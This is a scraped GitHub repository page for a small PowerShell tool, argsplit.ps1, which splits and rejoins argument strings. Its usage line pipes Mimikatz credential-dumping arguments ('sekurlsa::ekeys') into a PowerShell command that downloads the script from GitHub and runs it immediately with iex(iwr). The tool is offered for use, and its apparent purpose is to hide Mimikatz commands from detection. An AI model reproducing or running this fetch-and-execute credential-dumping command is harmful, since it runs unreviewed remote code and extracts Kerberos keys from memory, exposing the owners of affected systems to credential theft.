8000 GitHub - zief/Powershell-Misc: Split arguments.
[go: up one dir, main page]
More Web Proxy on the site http://driver.im/
Skip to content

zief/Powershell-Misc

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
 
 
 
 
 
 

Repository files navigation

Powershell-Misc

argsplit.ps1 : Split string and assigned each of the characters to variable. Next it will joined all the variable.

Usage :

echo '"sekurlsa::ekeys" "exit"'| powershell -c "(iex(iwr https://raw.githubusercontent.com/zief/Powershell-Misc/main/argsplit.ps1 -usebasicparsing))"

About

Split arguments.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published
0